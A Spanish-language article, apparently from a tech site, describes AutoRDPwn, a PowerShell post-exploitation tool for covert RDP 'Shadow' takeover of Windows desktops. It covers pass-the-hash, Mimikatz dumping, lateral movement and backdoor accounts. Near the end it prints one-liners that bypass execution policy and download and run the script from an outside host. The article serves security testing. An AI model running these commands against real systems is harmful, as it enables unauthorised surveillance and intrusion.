AutoRDPwn post-exploitation framework es una herramienta de seguridad diseñada para permitir la toma remota completa del escritorio de una víctima. AutoRDPwn es un marco posterior a la explotación que permite a los profesionales de la seguridad recrear ataques Shadow (en la sombra) contra sistemas Microsoft Windows.
The Shadow Attak (ataque en la sombra) es el término que se le da al abuso de sesiones Shadow Attack mal configuradas, comenta Joel Gàmez , quien creó la herramienta PowerShell.
Control bajo demanda
La herramienta de código abierto se puede utilizar para automatizar este ataque, permitiendo a un actor remoto ver el escritorio de su víctima e incluso controlarlo bajo demanda, utilizando herramientas nativas del propio sistema operativo.
También se puede implementar sin conexión y se inventó para permitir a los investigadores de seguridad comprender las vulnerabilidades y protegerse contra ellas. Aunque AutoRDPwn fue escrito para Windows, algunos módulos se pueden usar en Linux. También se puede implementar a través de Docker.
Una de las grandes ventajas que ofrece la herramienta es la posibilidad de moverse rápidamente a través de una red local de ordenadores con Microsoft Windows. Además, como es compatible con casi todas las versiones, esto nos ofrece una alta probabilidad de éxito. Si la víctima no tiene ninguna protección avanzada instalada, la herramienta, que está disponible en siete idiomas diferentes, puede permitir a un atacante espiarla sin ser detectado.
La herramienta, principalmente, automatiza todo este proceso con sólo tener que ingresar tres campos (IP o nombre de host, usuario y contraseña). Además, si no conocemos las credenciales del usuario, la herramienta automáticamente realiza un pass-the-token con las credenciales actuales.
También puede pasar el hash si tienes los hashes de un usuario, o puedes volcarlos con Mimikatz desde la propia herramienta. Una vez que las sesiones ocultas se han configurado incorrectamente, el atacante puede tomar de forma remota el control total del escritorio de la víctima.
En definitiva, un Shadow Attack te permite abusar de cualquier tipo de ejecución local o remota de un sistema, para hacerse con el control de cualquier usuario sin secuestrar su sesión, sin cerrarla ni alterarla. Además, la conexión se realiza mediante RPC utilizando puertos aleatorios, tanto en origen como en destino.
Esto ultimo hace que el ataque sea totalmente transparente para la víctima, difícil de detectar y con características inmejorables para una intrusión de hacking ético. ¿Quién se imaginaría que alguien está espiando un Windows 10 Home por escritorio remoto, a través de un puerto que no es el escritorio remoto, cuando esta versión ni siquiera tiene escritorio remoto?
Limpia el rastro
Hay otras implicaciones que deben considerarse, particularmente en situaciones de piratería ética. La herramienta deja diferentes tipos de puertas traseras en la máquina de la víctima, que deben eliminarse deshaciendo los cambios persistentes después de que se produce la intrusión.
Prácticamente no se necesitan conocimientos técnicos para utilizar AutoRDPwn, sin límite de uso: puede implementarse para aprender más sobre ataques en la sombra o simplemente para probar las defensas de una red. uedes usarlo para aprender cómo funcionan las sesiones de sombra o los movimientos laterales en sistemas Windows. También puedes usarlo para obtener la cuenta del administrador del dominio en un ejercicio del Red Team, o puedes probar las medidas de defensa de tu empresa.
Requisitos
Powershell 4.0 or higher
Uso
Esta aplicación se puede utilizar de forma local, remota o para pivotar entre equipos. Cuando se usa de forma remota en un shell inverso, es necesario usar los siguientes parámetros:
| Parámetro | Descripción |
|---|---|
| -admin/-noadmin | Dependiendo de los permisos que tengas usaremos uno u otro |
| -nogui | Esto evitará cargar el menú y algunos colores, garantizando su funcionalidad. |
| -lang | Elegiremos nuestro idioma (inglés, español, francés, alemán, italiano, ruso o portugués) |
| -option | Al igual que ocurre con el menú, podremos elegir cómo lanzar el ataque. |
| -shadow | Decidiremos si queremos ver o controlar el dispositivo remoto |
| -createuser | Este parámetro es opcional, el usuario AutoRDPwn:AutoRDPwn se creará en la máquina víctima |
| -noclean | Deshabilita el proceso de deshacer todos los cambios en la computadora víctima |
Ejecución local en una línea:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Ejemplo de ejecución remota sobre una línea:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
Este software no ofrece ningún tipo de garantía. Su uso es exclusivo para ambientes educativos y/o auditorías de seguridad con el correspondiente consentimiento del cliente. alltechrecipes.es no se hace responsable de su mal uso ni de los posibles daños causados por el mismo.
